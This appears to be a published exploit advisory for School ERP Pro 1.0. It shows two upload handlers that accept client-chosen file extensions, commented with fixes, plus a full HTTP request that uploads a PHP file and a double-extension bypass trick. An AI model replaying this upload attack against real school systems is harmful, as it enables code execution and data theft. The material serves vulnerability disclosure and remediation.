## https://sploitus.com/exploit?id=PACKETSTORM:157473
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution  
# Date: 2020-04-28  
# Author: Besim ALTINOK  
# Vendor Homepage: http://arox.in  
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/  
# Version: latest version  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
  
Description  
-------------------------------------------  
A student can send a message to the admin. Through the same feature, the student  
can upload a PHP file to the server and execute code on it.  
  
------------------------------------  
*Vulnerable code - 1: (for student area) - sendmail.inc.php*  
- A student user can send a message to the admin with an attachment  
------------------------------------  
// Review (sendmail.inc.php, student message attachment): the attachment is stored under a  
// name derived from the client-supplied filename, and nothing in this fragment checks the  
// extension or content type, so any file type is accepted as-is. Mitigations: validate the  
// extension/MIME type against an allowlist, generate the stored name server-side (e.g. from  
// random_bytes()), keep uploads outside the document root or disable script execution in the  
// upload directory, and check the return value of move_uploaded_file().  
// basename() only strips directory components; $image_file is not used below -- the stored  
// name is built from $ext instead.  
$image_file = basename($_FILES['newimage']['name'][$i]);  
// Split the raw client filename on "."; $ext[0] is the base name and $ext[1] is the text  
// after the first dot, both still client-controlled. No allowlist check is applied here.  
$ext=explode(".",$_FILES['newimage']['name'][$i]);  
// Second-resolution timestamp: the only server-supplied part of the stored name.  
$str=date("mdY_hms");  
// The random component is commented out, so $t is undefined here unless it is assigned  
// outside this excerpt; the resulting filename is effectively predictable.  
//$t=rand(1, 15);  
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];  
// Fixed upload directory; the PoC below stores shell.php here and the description states the  
// file can then be executed, so this path is presumably served by the web server -- confirm.  
$updir = "images/messagedoc/";  
$dest_path = $updir.$new_thumbname;  
$up_images[$i] = $dest_path;  
$srcfile = $_FILES['newimage']['tmp_name'][$i];  
// "@" silences warnings and the boolean result is discarded, so a failed move is not  
// detected and the DB row below is written regardless.  
@move_uploaded_file($srcfile, $dest_path);  
// Record the stored filename against the message ($id and $db come from outside this excerpt).  
$ins_arr_prod_images = array(  
'`es_messagesid`' => $id,  
'`message_doc`' => $new_thumbname  
);  
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);  
  
---------------------------------------------------  
*PoC of the Remote Code Execution*  
---------------------------------------------------  
  
POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 ***************************  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer:  
http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin  
Content-Type: multipart/form-data;  
boundary=---------------------------2104557667975595321153031663  
Content-Length: 718  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c  
Upgrade-Insecure-Requests: 1  
  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="subject"  
  
DEDED  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="message"  
  
<p>DEDED</p>  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"  
Content-Type: text/php  
  
<?php phpinfo(); ?>  
  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="filecount[]"  
  
1  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="submit_staff"  
  
Send  
-----------------------------2104557667975595321153031663--  
  
  
------------------------------------  
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*  
- An admin user can update a user's profile photo  
------------------------------------  
// Review (pre-editstudent.inc.php, admin profile-photo upload): same pattern as the student  
// attachment upload -- the stored extension comes from the client filename with no allowlist.  
// is_uploaded_file() only confirms the path came from an HTTP upload; it says nothing about  
// the file's type or content.  
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {  
// Split on every "."; with a two-dot name such as shell.php.png (see the bypass section  
// below) $ext[1] is "php", so the saved extension is whatever follows the FIRST dot.  
$ext = explode(".",$_FILES['pre_image']['name']);  
$str = date("mdY_hms");  
// Stored name = fixed prefix + timestamp + client base name + client-controlled extension.  
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];  
$updir = "images/student_photos/";  
$uppath = $updir.$new_thumbname;  
// Return value is not checked; a failed move goes unnoticed.  
move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);  
$file = $new_thumbname;  
// NOTE: the if-block continues past this excerpt (closing brace not shown).  
  
------------------------------------  
Bypass Technique:  
------------------------------------  
  
$_FILES['pre_image']['name']; --- > shell.php.png  
$ext = explode(".",$_FILES['pre_image']['name']);  
---  
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];  
$ext[0] --> shell  
$ext[1] --> php  
final filename --> st_date_shell.php